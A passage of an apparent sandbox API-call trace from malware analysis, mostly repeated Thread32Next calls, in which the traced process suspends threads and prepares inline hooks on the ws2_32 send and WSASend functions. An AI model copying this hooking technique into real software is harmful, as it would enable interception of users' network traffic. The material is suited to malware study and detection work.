lpte=0x20dfe88) returned 1 [0165.678] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.678] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.679] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.679] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.679] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.680] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.680] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.680] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.681] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.681] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.681] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.681] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.682] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.682] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.682] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.683] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.683] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.683] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.683] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.684] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.684] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.684] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.685] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.685] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.685] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.685] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.686] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.686] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.726] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.726] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.726] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.727] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.727] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.727] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.728] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.728] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.728] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.729] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.729] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.729] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.729] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.730] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.730] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.730] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.731] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.731] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.731] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.731] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.732] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.732] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.732] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.733] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.733] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.733] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.733] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.734] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.734] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.734] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.735] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.735] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.735] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.735] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.736] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.736] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.736] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.737] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.737] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.737] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.737] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.738] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.738] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.738] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.739] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.739] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.739] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.739] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.740] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.740] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.740] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.741] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.741] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.741] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.741] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.742] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.742] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.742] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.743] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.743] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.744] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.744] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.744] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.744] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.745] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.745] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.745] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.746] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.746] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.746] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.746] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.747] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.747] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.747] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.748] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.748] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.748] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.748] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.749] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.749] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.749] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.750] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.750] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.750] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.750] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.751] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.751] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.751] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.752] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.752] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.752] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.752] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.753] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.753] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.753] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.754] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.754] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.754] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.754] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.755] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.755] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.755] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.756] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.756] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.756] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.756] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.757] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.757] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.757] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.758] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.798] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.798] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.799] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.799] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.799] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.799] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.800] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.800] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.800] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.801] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.801] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.801] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.802] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.802] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.802] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.802] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.803] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.803] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.803] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.804] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.804] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.804] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.804] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.805] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.805] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.805] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.805] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.806] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.806] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.806] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.807] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.807] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.807] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.808] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.808] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.808] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.825] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5b0) returned 0x8c [0165.825] SuspendThread (hThread=0x8c) returned 0x0 [0165.825] CloseHandle (hObject=0x8c) returned 1 [0165.825] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d4) returned 0x8c [0165.825] SuspendThread (hThread=0x8c) returned 0x0 [0165.825] CloseHandle (hObject=0x8c) returned 1 [0165.916] CloseHandle (hObject=0x88) returned 1 [0165.916] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0165.916] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0165.917] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0165.917] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xc0000 [0165.917] RtlMoveMemory (in: Destination=0xc0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xc0000) [0165.917] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0165.922] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0165.922] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0165.923] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x20) returned 1 [0165.923] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0165.923] RtlMoveMemory (in: Destination=0x1d0000, Source=0x75bc4406, Length=0x5 | out: Destination=0x1d0000) [0165.923] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x74224 | out: lpflOldProtect=0x74224*=0x40) returned 1 [0165.928] GetCurrentProcessId () returned 0x62c [0165.928] GetCurrentThreadId () returned 0x5cc [0165.928] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0166.007] Thread32First (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.007] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.007] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.008] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.008] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.009] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.009] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.009] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.010] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.010] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.010] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.010] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.011] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.011] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.011] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.012] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.012] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.012] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.013] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.013] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.013] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.013] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.014] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.014] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.014] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.015] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.015] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.015] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.016] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.016] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.016] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.016] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.017] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.017] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.017] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.018] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.018] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.018] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.019] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.019] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.019] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.019] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.020] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.020] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.020] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.021] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.021] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.021] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.022] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.022] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.022] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.022] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.023] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.023] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.023] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.024] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.024] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.024] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.025] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.025] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.025] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.025] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.026] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.026] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.026] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.027] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.027] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.027] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.028] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.028] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.028] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.028] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.029] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.029] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.029] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.030] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.030] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.030] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.031] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.031] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.031] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.031] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.032] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.032] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.032] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.033] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.033] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.033] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.034] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.034] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.034] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.034] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.035] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.035] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.035] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.036] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.036] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.036] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.037] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.037] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.037] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.037] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.038] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.038] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.038] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.039] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.039] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.154] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.154] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.154] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.155] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.155] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.155] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.156] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.156] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.156] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.156] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.157] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.157] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.157] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.158] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.158] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.158] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.158] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.159] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.159] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.159] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.160] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.160] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.160] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.160] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.161] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.161] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.161] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.162] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.162] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.162] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.162] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.163] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.163] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.163] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.164] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.164] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.164] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.165] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.165] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.165] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.165] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.166] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.166] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.166] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.167] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.167] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.167] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.167] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.168] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.168] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.168] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.168] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.169] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.169] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.169] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.170] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0166.170] Thread32Next 